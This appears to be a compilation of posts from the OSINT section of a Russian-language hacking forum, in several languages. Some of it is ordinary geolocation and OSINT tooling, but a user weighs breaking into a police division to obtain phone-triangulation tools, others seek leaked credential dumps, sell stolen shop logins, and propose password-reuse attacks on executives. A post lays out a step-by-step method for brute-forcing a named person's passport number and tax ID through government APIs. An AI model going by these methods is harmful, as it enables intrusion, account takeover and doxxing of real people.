режимы мы скорее всего не найдем. Это как в том анекдоте:
- Петр петрович, доброе утро. Вас из ФСБ беспокоят
- Да я уже понял, вы мне на выключенный телефон дозвонились
Так что вытаскивайте батарею, на всякий случай. Владельцам ифонов можно только
посочуствовать.
**The reason why i started this thread :
According to lots of people the cops have this technology and i want to get access to one of those things , i tried to hack into a cyber police division , they were vulnerable but i didn't proceed to hack them because i don't know what to look for, whether the triangulation thing is a software tool ,an application with some login requirements , or is it a service provided by the telephone companies by contacting them directly , whether every cyber police divisions will have those tools , , whether such tools work anywhere else , how they will be normally stored etc, i need more information and some advice , whether to proceed hacking the police division or can i find it somewhere else**
tiptiptop.top {5.125} [HASH+NOHASH] (Business).rar
i need this file.
in cit0day business.
thanks
Лучшее средство для сбора данных и деанонимизации пользователей. Огромнейшая OSINT Wiki. Big Bro premium. Satana Sploit версии 2.0. Для работы вам понадобится немного API.
Установка.
git clone https://github.com/Bafomet666/OSINT-SAN
sudo pip3 install -r requirements.txt
Зарегистрировать API, прописать их в settings
Запуск:
python3 osintsan.py
Обновляем постоянно.
https://www.bleepingcomputer[.]com/...alys-likely-latest-victim-of-accellion- hacks/
leakix.net
leaks.sh
Free tool to search if your email address or username has been involved in a data breach. Try today and share with your friends to help keep your data and the web safe.
beenleaked.com
](https://leakcheck.net/)
Data breach search engine, low price starting from $2.99/day, unlimited API, 7B+ records
leakcheck.net
Resources and Information. ](https://databases.today/)
databases.today réunit des informations et annonces. Nous espérons que vous y trouverez les informations que vous recherchez !
databases.today
Bitcoin check & search websites
![www.blockchain.com](/proxy.php?image=https%3A%2F%2Fwww.blockchain.com%2Fexplorer- frontend%2F_next%2Fimage%3Furl%3D%2Fimages%2Fexplorer_og.png%26w%3D384%26q%3D75&hash=7afcff259027807d7dd1cbdf430f84c5&return_error=1)
The most popular and trusted block explorer and crypto transaction search engine.
www.blockchain.com
Telegram group / channel search:
http://tgstat.ru
http://telegramchannels.me
https://telegramdb.org
leave a like,please
инструменты поиска и брутфорса которые использовать нужно, только с разрешения владельца ресурса, хочу вас предупредить что я не несу никакой ответственности за ваши действия при работе с фреймворком. В фреймворке используется небольшое количество API. Вам необходимо их создать самому.
17-31-57.png](https://xss.is/attachments/19013/)
Can anyone share alternate link for the http://6hg6vbo53vk6dkjb.onion/
australian leaks
RUSSIAN
Кто-нибудь использует такие сервисы, как RocketReach с HaveIBeenPwned для
целевых атак?
Для нацеливания на одного человека,
Предположим, что они используют один и тот же пароль для нескольких служб!
многие генеральные директора, финансовые директора могут быть
скомпрометированы таким образом
ENGLISH
Is anyone using services like RocketReach with HaveIBeenPwned for targeted
attacks?
For targeting one person,
Assume that they use the same password for multiple services!
many CEOs, CFOs can be compromised this way
Vendo logins kabum, elo,riachuelo,magazineluiza.
para mais informações deixe sua mensagem
Приветствую друзья, Миф на связи! Добро пожаловать на курс "Русский OSINT"!
Пару слов о курсе. Я уже много раз думал назвать его иначе, причина на том что многие попросту не понимают что такое OSINT.
На самом деле все проще чем кажется, ибо термин "Разведка" известен практически всем с самых ранних лет.
Все в детстве мечтали быть шпионами, разведчиками и вот мечта воплотилась. Теперь каждый из тех кто читает этот текст, может стать разведчиком не выходя из дома (Ну правда это немного повлияет на качество собранной информации
в 2000-х информационное пространство, стало расти в геометрической прогрессии. Если раньше что бы получить разведданные, нужно было встречаться с осведомителями (Да да, сарафанное радио существует очень давно), то сейчас и не нужно никого и спрашивать, люди сами выкладывают информацию о себе, нужно лишь знать где ее искать и как структурировать.
Если раньше нужно было "слушать эфир" то сейчас достаточно подписаться на человека и получать таргетированую информацию о нашей цели.
Моя задача в рамках этого курса, показать сцену сбора информации из открытых источников именно в России, как я и сказал до этого.
Но в целом методы которым вы обучитесь, они универсальны. Я не хочу показать все сервисы, которые существую, это невозможно. Я хочу показать методологию поиска, систематизации и анализирования информации.
Так же вижу необходимым донести каждому, что информация, особенно необдуманно выложенная может быть угрозой, либо находкой для кого то в корыстных целях.
Для кого этот курс:
Журналисты
Частные детективы
Специалисты по информационной безопасности
Чему вы научитесь:
Разведка на основе открытых источников
OSINT
NetStalking
Пробив
Этот курс включает:
7,5 часов видео
Требования:
Минимальные знания Linux для некоторых блоков
Telegramm аккаунт
Продажник:
https://www.udemy.co...e/russianosint/
Скачать:
https://cloud.mail.r...4P8N/4ptok74mP/
пароль: www.inprofit.biz
Можете изучить. Лишним не будет
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/2E11DSgD#9d6bB0tm6B_qM5LzZecv04T2Kxe2ydgEhHLANPOtqT0)
mega.nz
Для аналитика ориентирование по окружению на фотографиях не является инновацией. Проверка фото или видео часто сводится к тщательному осмотру городских пейзажей, очертаний ландшафта и названий улиц. Я начал задумываться о том, насколько сложно будет использовать природные подсказки, работая как в национальном, так и в глобальном масштабе.
Я видел, как выживальщики в телевизоре путешествуют по густым лесам, опираясь только на свои знания о растениях и картографированию солнца. Если они хорошо с этим справляются, я подумал, что, возможно, аналогичные навыки можно использовать и при проверке изображений. Проведя некоторые исследования, я определил, что есть несколько эффективных методов, которые можно использовать для получения подсказок из изображений, опираясь только на знания о растениях и животных.
Примечание : я не выживальщик и, уж тем более, не биолог. Я разбивал лагерь, возможно, 3 раза за всю свою жизнь и, вероятно, умру после одного дня на природе. Поэтому, пожалуйста, не забывайте перепроверять все выводы, основанные на описанных далее методах.
Click to expand...
Ле Страуд думает о том, как он переживет нас всех во время апокалипсиса 2020
года
Идентификация растений
Представим, что мы получили фотографию с места преступления, на которой
изображен густой лесной массив. На фото нет ничего конкретного, просто
природа. С чего начать?
Идентификация растений на фотографии, которые могут быть местными для этого
района, является отличной отправной точкой. Растения, произрастающие в
конкретном регионе, могут позволить нам определить штат или страну, где была
сделана фотография.
В качестве примера я взял снимок из мартовской «Викторины» от [Sector035](https://medium.com/u/11b74c021582?source=post_page----- e34dc9f42ed----------------------), и вырезал из него фрагмент с травой. Затем пошел на identif.plantnet.org и загрузил это его туда.
Identify.plantnet.org выдает множество предложений о том, что это может быть
за трава. Он также показывает несколько фотографий каждого вида
предполагаемого растения, чтобы мы могли сравнить их с оригиналом. Мне
кажется, что в данном случае, растения с фото выше напоминают рогоз
широколистый (Týpha latifólia).
Способность идентифицировать растения - это только первый шаг. Как правило,
растения с фото могут произрастать и в других местах, вдали от своего
естественного ареала обитания. Поэтому, хотя этот способ поиска и может дать
какие-то результаты, я не считаю, что они будут достаточно точными. К примеру,
на фотографии может быть изображена экспозиция садоводов, которые высаживали
растения из других регионов вручную, поэтому, в данном случае, такой трюк не
пройдет.
Помимо этого, можно также рассмотреть привычки растений произрастать на тех или иных поверхностях. Большинство видов лишайников серого или зеленого цвета, как известно, растут в тенистых областях, однако лишайники ржавого цвета (Xanthoria Perientina) растут только на поверхностях с южной стороны. Этот критерий также стоит учитывать.
Такие травы, как ситник развесистый (Soft Rush), любят произрастать на влажной
почве и могут указывать на болото поблизости. На фотографии ниже мы можем
увидеть "пятна" травы на тех местах, где земля более влажная, чем окружающая
территория. Такие паттерны также встречаются и в росте деревьев, о чем я
расскажу в следующем разделе.
Идентификация деревьев
Натуралисты учатся замечать, как солнце влияет на рост растений, и как
направление ветра может формировать линию деревьев. Мы также можем попытаться
определить окружающий ландшафт на нашей фотографии, посмотрев на деревья.
Определенные виды деревьев могут быть отмечены в определенных географических областях в США. Например, деревья, имеющие название "нисса лесная" (tupelo), чаще всего встречаются в южном регионе и на восточном побережье, где они растут в болотистой стоячей воде.
В то время как гигантские деревья красного дерева (Секвойи) можно найти на
западном побережье в Калифорнии. А линии ивы и ольхи любят расти возле рек и
часто указывают на близлежащий источник воды.
Определение страны, в которой сделано фото, также возможно при изучении
деревьев с фотографий. К примеру, Баобаб с фотографии ниже может сузить наш
поиск до конкретных областей в Австралии, Мадагаскаре и Африке. Можно также
использовать сайт What Tree Is
That?, для
поиска по Северной Америке.
Я также столкнулся с еще одной интересной вещью, - это использование
повреждения дерева от ветра как индикатор направления движения. Одиночные
лиственные деревья, вроде того, фотография которого находится ниже, являются
лучшим источником для такого анализа. Дело в том, что ветер дует
последовательно в определенных направлениях и может в конечном итоге
подтолкнуть ветви дерева к тому же росту.
Если мы знаем примерно, где была сделана фотография, мы можем уточнить
потенциальные локали, при помощи карты ветров.
Наконец, размещение деревьев вдоль ландшафта поможет определить примерную
высоту, на которой была сделана фотография. Глядя на фотографию ниже, мы можем
ясно видеть странное явление, связанное с деревьями, которое никто не может до
конца объяснить, называемое «[глобальный лесной
участок](https://www.nature.com/scitable/knowledge/library/global-treeline-
position-15897370/)» (простите, я не нашел подходящего эквивалента в русском).
Глобальный лесной участок - это грубая линия деревьев, показывающая область
возвышения, на которой они больше не могут произрастать, из-за проблем с
почвой или из-за уменьшения количества воздуха.
Сложность использования данной линии для геолокации заключается в том, что,
хотя это глобальное явление, высота над уровнем моря варьируется в зависимости
от района, как показано на приведенной ниже диаграмме. При проверке, нам нужно
иметь общее представление о стартовом местоположении.
Были также интересные исследования по идентификации деревьев на больших
территориях по аэрофотоснимкам, которые, в основном, реализуются при помощи
алгоритмов.
Есть несколько методов, которые я использовал на сайтах по охоте на оленей,
которые мы можем использовать здесь, используя Google Earth. Похоже, что
охотники используют Google Earth для осмотра своих охотничьих угодий и смотрят
на деревья, чтобы найти возможные тропы оленей. Охотники определяют, что за
деревья произрастают на территории, используя опцию истории Google Earth и
глядя на районы осенью или зимой. Дубы держат свои листья дольше в осенне-
зимний сезон, поэтому они будут отчетливо видны на фотографиях и их сложно с
чем-то спутать. Осенью мы также можем оперироваться на цвет, чтобы определить
тип дерева.
Идентификация Сельскохозяйственных Культур
Помимо вышеописанных методов, для того, чтобы определить, в каких районах
произрастает та или иная сельскохозяйственная культура, можно использовать
аэрофотоснимки или фотографии со спутника. Как правило, сельскохозяйственные
культуры часто имеют привязку к тому или иному региону и могут быть определены
с использованием макетов полей, растений и животных.
На снимках ниже находятся поля с кукурузой, соевыми бобы, рисом и оливками, -
каждый вид выращиваются особым образом, поэтому их просто различить.
Опираясь на различные мануалы по правильному ухаживанию за культурами (где и
как их растить) в сочетании с оборудованием и зданиями, обнаруженными на
земле, мы можем предположить местоположение.
Идентификация животных
Если на фотографии изображено сельскохозяйственное животное, можно попытаться
определить ее местоположение на основе преобладающей сельскохозяйственной
отрасли в регионе. Если мы посмотрим на карту ниже, то увидим, в каких
регионах, какой скот преобладает. К примеру, если мы увидим на фотографии
свиноферму, затем взглянем на карту, то прийдем к выводу, что она, возможно,
сделана в районе штата Айова / Иллинойс.
Птицы - еще один замечательный ресурс для геолокации, поскольку они очень
часто оказываются на фотографиях, сделанных на открытом воздухе. Использование
бесплатного приложения, такого как Merlin Bird
ID от Cornell, позволяет нам
идентифицировать птицу по загруженной фотографии.
После того, как мы определили вид птицы, например каштановобрюхий ястреб (как
на фотографии ниже), мы можем перейти сайт, вроде
Ebird.org, чтобы определить родину этой птицы.
Вбив в поисковую строку вид птицы, становится очевидно, что она обитает только
в Западной части Центральной Африки, что значительно сужает область поиска. В
конечном итоге мы объединяем результаты, полученные при идентификации
растений, деревьев и птиц и пытаемся найти область, соответствующую
изображению.
Случаи использования
Все это звучит довольно причудливо, но когда-нибудь нам пригодятся подобные
техники? Ну, если вы хотите попрактиковаться в этой области, я бы определенно
порекомендовал Quiz Time. В качестве
ежедневных загадок для исследования часто предлагают пейзажи с различной
растительностью. Более благородная причина - Europol’s Trace an
Object. Европол публикует
фотографии случаев детской эксплуатации (без самих детей) и просит помочь
определить, где они были сделаны / что изображено на них. Эти фотографии часто
сделаны в лесных массивах, которые можно попытаться идентифицировать.
Если вам поможет какой - нибудь из этих методах, я хотел бы знать это! Если у вас есть еще способы, сообщите мне о них.
[Некоторая информация для этой статьи была найдена в Natural Navigator, почитайте и его!](https://www.amazon.co.uk/Natural-Navigator-Tristan- Gooley/dp/0753541882/ref=sr_1_1?ie=UTF8&qid=1527448934&sr=8-1&keywords=the+natural+navigator)
Автор: на английском [здесь](https://medium.com/@raebaker/how-nature-may-
reveal-secrets-in-geolocation-e34dc9f42ed).
Перевод: Moody, канал Cybred
В гугл можно программировать собственные поисковые системы. Гибкие настройки.
Вот пример двух поисковых систем в гугл по телеграму
We provide free open source intelligence tools to help with investigations. Use the tools to search on 3rd party sites and perform social media intelligence on Facebook, Twitter, LinkedIn, Telegram and YouTube.
intelx.io
_
](https://quantika14.com/dantes-gates-minimal-version/)
Dante's Gates Minimal Version es una suite de herramientas para hacer OSINT a nicks, personas, empresas, teléfonos, DNIs y mucho más.
![quantika14.com](/proxy.php?image=https%3A%2F%2Fi0.wp.com%2Fquantika14.com%2Fwp- content%2Fuploads%2F2018%2F07%2Fcropped-logo- blanco.png%3Ffit%3D32%252C32%26ssl%3D1&hash=d170b624b22127594ff1924eb9021b40&return_error=1) quantika14.com
_
нужен взлом сайта. Чтобы парализовать его работу.
Подкину интересную ссылочку клик Предлагаю так же публиковать в этой теме подобное
Список инструментов для osint
У metaosint есть огромная библиотека, полная источников, которые тоже можно
использовать
добавлю позже
metaosint.github.io
OSINT4ALL aims to provide practical & easy OSINT toolkit for researchers of all level to use.
start.me
](https://start.me/p/b5Aow7/asint_collection)
A startpage with online resources about AsINT_Collection, created by Jk.
start.me
](https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list)
A startpage with online resources about Nixintel's OSINT Resource List, created by start.me.
start.me
Find out people's home addresses, phone numbers, e-mails, social media profiles, VINs, names of relatives and more...
ufind.name
Всем доброго дня! Кто-то мог бы подсказать сервисы по пробиву людей в UK , аналоги западного truthfinder/spokeo/mylife/Instant checkmate , если таковые существуют. Мои поиски пока не увенчались успехом. Буду очень признателен, если кто сможет помочь.
Материал в файле :
Все, что ниже описано - лишь абстрактные рассуждения, которые требуют
доработки.
Чукча не писатель, Чукча — читатель, теоретик
Вводные:
Дано ФИО – Иванов Иван Иванович, год рождения 01.01.2000 и район проживания
субъекта(Приозерский район, Ленинградской области)
Задача:
получить номер паспорта и ИНН
Описание шагов:
1. Для начала предлагаю попробовать проверить, что в Приозерском районе
существует такой гражданин. Для этого зайдем на сайт
https://fssp.gov.ru/iss/Ip и поищем по Ленинградской области Иванова Иван
Ивановича 01.01.2000 года рождения. С большой долей вероятности мы не найдем
полезной информации, но может и повезет найти исполнительные производства по
нему
2. Как известно ИНН физического лица представляет собой последовательность из
12 арабских цифр. Первые две из них означают код субъекта Российской
Федерации, третья и четвертая — номер налоговой инспекции, шесть цифр с пятой
по десятую — номер налоговой записи налогоплательщика.
Предположим, что данный гражданин получал свой ИНН в Приозерском районе,
Ленинградской области. Тогда его ИНН должен начинаться с 47. Коды ИФНС можно
посмотреть тут: https://service.nalog.ru/addrno.do Получается, что возможные
варианты, с которых начинается ИНН нашего персонажа – 4700, 4704, 4705, 4706,
4707, 4727.
3. Как известно Серия паспорта состоит из четырех цифр, где первые две —
номер региона, выдавшего документ, а следующие — год, когда документ был
получен. Зная это, можно угадать серию паспорта практически любого человека.
Шесть чисел рядом с серией — номер паспорта. Цифры не имеют особенного смысла,
это расшифровка номера бланка, на котором печатался паспорт. Он уникален, двух
документов с полностью идентичным номером не может быть.
В нашем случае номер региона, где ВОЗМОЖНО был выдан паспорт – 47. Теперь надо
понять, когда был выдан паспорт. Мы знаем дату рождения персонажа –
01.01.2000. Как известно, в РФ паспорта получают(меняют) в 14, 20 и 45 лет. В
нашем случае персонаж должен был уже поменять паспорт в 20 лет. С учетом даты
его рождения, вторая группа цифр в паспорте может быть 19 или 20. ВАЖНО:
допустимо, что человек родился в январе и вторая группа цифр у него датируется
прошлым годом.
Получается, что возможные варианты его паспорта – 4719 или 4720.
4. На Гитхабе есть проект по доступу к API налоговой(в сети есть проекты и с
коммерческими API, с нужным функционалом) -
https://gist.github.com/nalgeon/547e95d4f6b7a8b06bcdc9de3c87856a
В рамках этого проекта для получения ИНН налогоплательщика мы должны передать:
Фамилию – имеется в исходных данных;
Имя – имеется в исходных данных;
Отчество - имеется в исходных данных;
Дату рождения - имеется в исходных данных;
Номер паспорта – в нашем случае это 1000000 плюс 1000000 вариантов. Т.е. 2 млн
вариантов.
ВАЖНО: прежде чем перебирать 2 млн. вариантов в рамках запроса ИНН, необходимо
их отфильтровать через API проверки действительных паспортов(есть не
коммерческие и коммерческие), например тут <https://github.com/omggga/fms-
passport-check?ysclid=l5hx8kqjxu165315845#default>
5. В нашем случае значения ИНН(первые 4 цифры), полученные в пункте 2 будут
являться контрольными значениями, для ИНН полученных через API запросы в
налоговую.
ВАЖНО ПОМНИТЬ: В РАМКАХ ПОДОБНОГО ПОИСКА ВОЗМОЖНЫ СИТУАЦИИ, КОГДА В ОДНОМ РЕГИОНЕ БУДУТ ИДЕНТИЧНЫЕ ЛЮДИ – У КОТОРЫХ СОВПАДАЮТ ФИО И ДАТА РОЖДЕНИЯ. ПОЭТОМУ ВЫБОРКУ НЕОБХОДИМО ПРОИЗВОДИТЬ ДО КОНЦА.
hello guys this boot is free service for searching email in data Breach
НЕ ИНТЕРЕСУЕТ ПАБЛИК ИНФА - не даeт весь список авто, принадлежащих
гражданину.
Ищу услугу или доступы к сервисам пробива всех авто (в том числе купленных в
лизинг) у граждан определенных штатов c указанием цвета авто.
url : https://1llegality.pages.dev/
why nobody on our forum has'nt noticed this one , it has popped up when the illict services went down , i came to know about this today .
Привет! Часто у вас бывают случаи, когда вы перебираете старые базы данных,
находите пару номеров и хотите проверить, какие из них ещё актуальны или
существуют в сети. В этом вам может помочь HLR-запрос (Home Location
Register). HLR-запросы — это централизованная база данных оператора связи,
содержащая подробную информацию о каждом абоненте мобильной сети. Это
необходимо для «чистки» базы клиентов, чтобы узнать, активен номер телефона
или нет.
Один из сайтов, который может помочь: https://smsc.ru/testhlr/ — 1 запрос в
24 часа с одного IP-адреса. Но, конечно, мы знаем, что такое VPN.
Если вам нужно получить информацию о профиле WhatsApp по номеру телефона, вы можете воспользоваться следующим ресурсом: https://whatsapp.checkleaked.cc/
Киньте ссылок на тематические форумы по OSINT, ру или нет не важно(хотя ру предпочтительнее).
Сам в теме не шарю, интересно есть ли вообще такие в ру сегменте..
Всем привет! Сегодня в интернете появилась новость: В Google Maps на новых
снимках видно позиции украинских военных систем.
Глава украинского Центра «противодействия дезинформации» Андрей Коваленко
пожаловался, что компанию попросили исправить это, но в Google выходные.
Товарищи OSINTERы реально ли как то найти координаты таких снимков. Просто чтоб понять фейк не фейк
I just came across one website to do all in one information gathering
![osint.sh](/proxy.php?image=https%3A%2F%2Fosint.sh%2Fimg%2Fosint- thumb.jpg&hash=169a7f2600c4954e8fad101a7f9c13e1&return_error=1)
All in one Information Gathering Tools
osint.sh
![ru.bellingcat.com](/proxy.php?image=https%3A%2F%2Fru.bellingcat.com%2Fapp%2Fuploads%2Fsites%2F2%2F2015%2F07%2FAnalytics- IDs-yEd.png&hash=7607d64d1e750343f1f778535004bc0f&return_error=1)
Беллингкэт ](https://ru.bellingcat.com/materialy/2016/08/31/alexander- analytics-ru/)
Translations:Русский (Россия)English (UK)Допустим, вы нашли в сети анонимный веб-сайт и хотите узнать, кто его создал. Воспользовавшись уникальным кодом, вы можете найти связь между этим ресурсом и другими сайтами и даже узнать, кто является их собственником. С правильными инструментами найти...
ru.bellingcat.com
About gathering good, trusted and actualized data from companies, what do you
think is the most reliable source?
I hear something about that Crunchbase sometimes doesn't have the new data and
keeps showing old information, but I would like to know your opinion.
At the moment I'm using both, but it's tired sometimes.
Думаю, все вы знаете "haveibeenpwned", сайт, где вы вводите свой адрес электронной почты, и он сообщает вам, если ваш пароль был найден в утечке. Мой вопрос заключается в следующем: знаете ли вы какой-нибудь сайт или другой способ, с помощью которого я могу узнать пароль к адресу электронной почты? Например: У меня есть адрес электронной почты, и сайт говорит, что утечки были найдены. Но как я могу увидеть пароль, который был там раньше?
Большое спасибо за информацию.
Дорогие п ользователи форума xss не могли бы вы подсказать инструменты которые проводят поиск по русским утечкам ?
Twitter lists search : https: //www.scoutzen.com/twitter-lists/search
Facebook mutual friends
search:https://www.facebook.com/browse/mutual_friends/?uid=id1&node=id2
![gist.github.com](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fimages%2Fmodules%2Fgists%2Fgist- og-image.png&hash=7ba136b878c585aa1e5b2c4c5eefa82a&return_error=1)
](https://gist.github.com/nil0x42/1f85510883cad48dd0c2d56bbb98edbc)
Awesome GitHub OSINT. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
Кто занимается OSINT в мессенджере Signal? Можно ли как у Telegram там деанонимизировать пользователей и парсить группы? Кто нибудь видел продукты готовые на эту тему? Спасибо
Airtable is a low-code platform for building collaborative apps. Customize your workflow, collaborate, and achieve ambitious outcomes. Get started for free.
airtable.com
Подскажите методы/статьи которые помогут в поиске по крипто кошельку , у меня есть только адрес , пробую разные сканеры блокчейна , пробую анализировать транзакции (выходит не очень) , пробую искать в гугле.
В правильном ли я направлении ? Подкиньте пищу для размышлений
Ищу по Эфиру , и разные мемкоины на основе Эфира
Nice collection going on here: https://github.com/fastfire/deepdarkCTI
For those who are into OSINT, perhaps TraceLabs OSINT image might be helpful. Enjoy!
Is anyone have idea how to get user mobile number from twitter or facebook without hacking that user is there any way to or tool to do that ?
Есть способы отследить смену username в tg? Мелкие кидалы постоянно меняют username, но id то постоянный в tg. Как можно посмотреть историю смен username? В xmpp есть плагин удобный для проверки на кидки, а в тг есть нечто подобное?
Custom Crawler Reports
**Search and Extract data from over 3 billion webpages in under 24 hours
](https://www.nerdydata.com/custom)
Search Engine For Source Code. Find websites using technology, HTML, Javascript, CSS Tags.
www.nerdydata.com
**
Какими сканерами вы предпочитаете пользоваться? Лично я, так как нахожусь только в развитии себя, пользуюсь nmap и пока без понятия какие есть еще сканеры. Очень интересно было бы послушать ваш опыт сканирования, даже nmap.
В этой статье я расскажу о том, как вычисляют администраторов ресурсов в Tor Network, то есть в дарквебе. Мы рассмотрим структуру сайтов в Tor, обсудим известные случаи деанона и многие другие особенности этого темного уголка интернета, который считается анонимным. По ходу дела я буду рекомендовать программы, которые помогут в работе.
Думаю, ты уже в курсе, что сайты, адрес которых заканчивается на .onion, — не простые и без дополнительных усилий открыть их в обычном браузере не выйдет. Так называемый дарквеб состоит из таких вот сайтов. Очень часто они посвящены торговле незаконными товарами и услугами. Конечно, ведь администраторам этих сайтов не приходится заполнять свои контактные данные при регистрации, никакой цензуры нет, а «луковая» маршрутизация через череду прокси‑серверов должна обеспечивать анонимность.
Сайты в Tor Network не индексируются обычными поисковиками, зато существуют специализированные поисковики, которые ищут только в Tor. В общем, как ты понял, это целый отдельный мир.
При обычной прямой IP-маршрутизации все относительно просто: один узел делает запрос по какому‑то адресу, другой отвечает на тот же адрес, с которого поступил запрос. В луковой же маршрутизации любой запрос сначала проходит через три узла, называемых нодами Tor. По умолчанию входной и выходной узлы шифруют информацию так, чтобы она прошла через следующий узел.
Идеальная защита от слежки? Не совсем. Любой в теории может сделать свой компьютер узлом‑посредником и собирать данные о запросах. Ты спросишь, кому это нужно, если информация зашифрована? А что, если атакующий будет собирать часть информации до шифрования, заразив входную ноду? Или наоборот — выходную, и получать данные о запрашиваемых ресурсах? Именно второй вариант наиболее распространенный.
К тому же злоумышленник может модифицировать или полностью изменить информацию, передаваемую от сервера клиенту. Так можно даже заразить устройство клиента вредоносным кодом.
В 2020 году была обнаружена хакерская группировка KAX17, которая управляла 900 зараженными серверами, к которым обращалось до 16% пользователей Tor.
Вот несколько инструментов, которые помогают исследовать ноды Tor:
Как и в обычном интернете, сайты в Tor могут получать от клиента информацию о разрешении экрана, количестве ядер компьютера и других параметрах, которые в совокупности могут составлять уникальный отпечаток.
Именно поэтому эксперты советуют не включать JavaScript на сайтах в даркнете
или как минимум не использовать браузер в полноэкранном режиме, чтобы не
выдавать размер экрана. Цифровой отпечаток — это, конечно, не так страшно, как
настоящие личные данные, но позволяет выделить уникального посетителя из
определенного количества.
Разведка через Whois и сервисы типа DNSdumpster в сети Tor просто невозможна, ведь луковичная система доменов работает совсем не так, как обычная. Вот ее основные отличия:
TorWhois — нечто вроде сервиса Whois для Tor. Позволяет получить информацию об открытых портах, сертификатах, ключах и информацию о robots.txt.
Есть исследование, которое показало, что DNS- трафик в сети Tor можно использовать для точного определения посещаемых сайтов. Исследователи разными методами анализировали DNS-запросы, проходящие через выходные узлы Tor, и выясняли корреляции этих запросов с конкретными сайтами.
Можно просто искать в запросах домены. Поскольку в адресах .onion домены состоят из сгенерированных идентификаторов, их легко сравнивать с идентификаторами в DNS-запросах и устанавливать соответствия. Это позволяет определить, какие конкретные сайты пользователь посещал через Tor.
В редких случаях администраторы не удаляют метаданные у файлов, размещенных на сайте, а метаданные могут включать такую информацию, как модель фотоаппарата, имя, геолокация и многое другое. Сейчас даже обычные соцсети удаляют метаданные при загрузке файлов.
Сайты в Tor используют обыкновенные CMS, как и сайты в «клирнете». Конечно, внутри всё те же HTML, CSS и другие привычные технологии. То есть тут нет ничего удивительного и нового. На скриншоте ты можешь увидеть, что автор сайта сделал его на Bootstrap. А использование популярных технологий, конечно, открывает возможность для автоматизации аудита в целях разведки. Для этого есть:
Чаще всего дарквеб используют для торговли запрещенными товарами и услугами. Вырученные деньги потом нужно как‑то выводить, и здесь торговцы запрещенным изобретают самые изощренные схемы. Обычно — с использованием криптовалюты. Именно на этапе вывода денег чаще всего и попадаются владельцы маркетплейсов.
Представь: клиент покупает крипту, покупает на нее что‑то в даркнете, криптовалюта хранится на депозите маркетплейса, затем большая часть переходит продавцу, а дальше он пытается ее обменять на фиатную валюту.
Получается, что можно установить, каким обменником пользуется продавец, если знать адрес его криптовалютного кошелька. Для этого достаточно визуализировать его активность с помощью специальной программы. На кошельке обменника, конечно же, будет огромное число транзакций и немалая сумма денег.
Визуализаторы зачастую платные, но есть и несколько бесплатных:
Часто при отмыве денег применяются криптовалютные миксеры. Они позволяют скрывать криптовалютные активы, распределяя их по множеству других кошельков, и затем снова переводят в один. Это усложняет отслеживание транзакций, но не делает их полностью анонимными.
Если визуализировать транзакции кошелька, который использовал миксер, можно заметить следующие особенности:
Найти настоящий адрес покупателя тяжело, но вполне реально. Однако ПО для анализа транзакций миксеров в открытом доступе пока что нет. Поэтому приходится просто идти по цепочке транзакций, пока не найдешь что‑то похожее на кошелек, принадлежащий человеку.
Как ты понял, отмыв денег и их отслеживание — это отдельная большая тема. Но знать о ней нужно, хотя бы на базовом уровне. Существует огромное количество схем легализации средств, полученных преступным путем, — от создания офшорных организаций до покупки разного имущества. Все это, мы, конечно, здесь разбирать не будем.
Поисковики и дорки (рецепты запросов) всегда были главным оружием современного OSINT-специалиста, и в сети Tor всё точно так же. Давай посмотрим, какие поисковики ищут по дарквебу.
Вот поисковые системы, доступные в клиренете, и индексирующие onion-сайты:
Многие из них удобны и позволяют комбинировать результаты из клирнета и дарквеба.
А вот список поисковых систем, у которых есть сайты в сети Tor (ссылки приведены на onion-адреса):
С этими системами можно пробовать базовые дорки вроде поиска точного совпадения (двойные кавычки), указания сайта, на котором искать (оператор site), оператора intext и прочих в том же духе. В большинстве поисковиков это сработает.
Если наша цель — вычислить администратора форума, то в ход идут любые приемы разведки. Например, если известны его интересы, то можно пройтись по тематическим форумам в поисках упоминания его никнейма.
Вот пример запроса, который выдаст результат поиска по архиву форума «Хакера» в поисках пользователя moon:
Code:Copy to clipboard
site:oldforum.xakep.ru intext:moon
Кстати, о тематических форумах. Есть вики, которые коллекционируют ссылки на сайты в дарквебе, и оттуда легко почерпнуть подборку адресов криминальных форумов. Вот некоторые из них:
Если ты знаешь, что человек увлекается, например, чтением, можешь проверить соответствующие разделы форумов.
Пользователи форумов и администраторы маркетплейсов тоже не роботы, так что им
свойственно допускать ошибки. К примеру, кто‑то может отправить свою
фотографию человеку, с которым познакомился в интернете. Я лично слышал о
нескольких случаях, когда задерживали администраторов крупнейших нелегальных
площадок, предлагая встретиться. Эксперты используют самые разные ловушки и
ханипоты, чтобы подсунуть преступнику файл, ссылку, а иногда целое фейковое
приложение или маркетплейс.
Ловушки вроде IP Logger или Canary Tokens — это самое простое и малобюджетное, что бывает. В случае с Canary Tokens ты можешь развернуть свой сервер с помощью готового образа для Doсker, который любезно предоставили нам разработчики. У этого инструмента много интересных возможностей, и, на мой взгляд, его часто недооценивают.
Что до IP Logger, то не рекомендую использовать его при попытках выследить
профессионалов. Эта программа скорее напоминает детскую игрушку, а не рабочий
инструмент, и мало‑мальски продвинутый пользователь сразу заподозрит недоброе.
Поскольку сайтам в Tor не запрещено использовать все стандартные технологии, здесь может работать и фингерпринтинг — отслеживание пользователей через уникальные отпечатки.
Для примера заглянем на сайт AmIUnique.org. Сервис без проблем определит версию движка, ОС, язык, шрифты, плагины и с некоторой точностью — поддерживаемые браузером аудио- и видеоплагины. Это сложно назвать точной идентификацией, но выделить одного подозреваемого из тысячи может помочь.
Tor Browser специально маскирует разрешение экрана, чтобы затруднить идентификацию, плюс пользователи могут сами подменить отпечаток на основе тега canvas. Все это делает фингерпринтинг менее точным, но не предотвращает его полностью.
Есть и более изощренные тактики, основанные на фингерпринтинге. Не все знают,
что если открыть Tor Browser и обычный и потом переключаться между ними
горячими клавишами или мышью, то можно выдать связь своего реального IP и IP в
сети Tor. Подводят уникальные закономерности вроде положения курсора мыши,
которое можно отследить. То же касается и использования двух вкладок в Tor
Browser. Tor будет использовать для них разные входные узлы, но, если включен
JavaScript, взаимосвязь между табами все же можно будет установить.
Не секрет, что у каждого свой стиль сообщений в социальных сетях, и администраторы форумов и маркетплейсов не исключение. Кто‑то часто ставит пробелы перед запятыми, кто‑то не фанат прописных букв, а у кого‑то просто сломана клавиатура и какая‑то кнопка часто не нажимается.
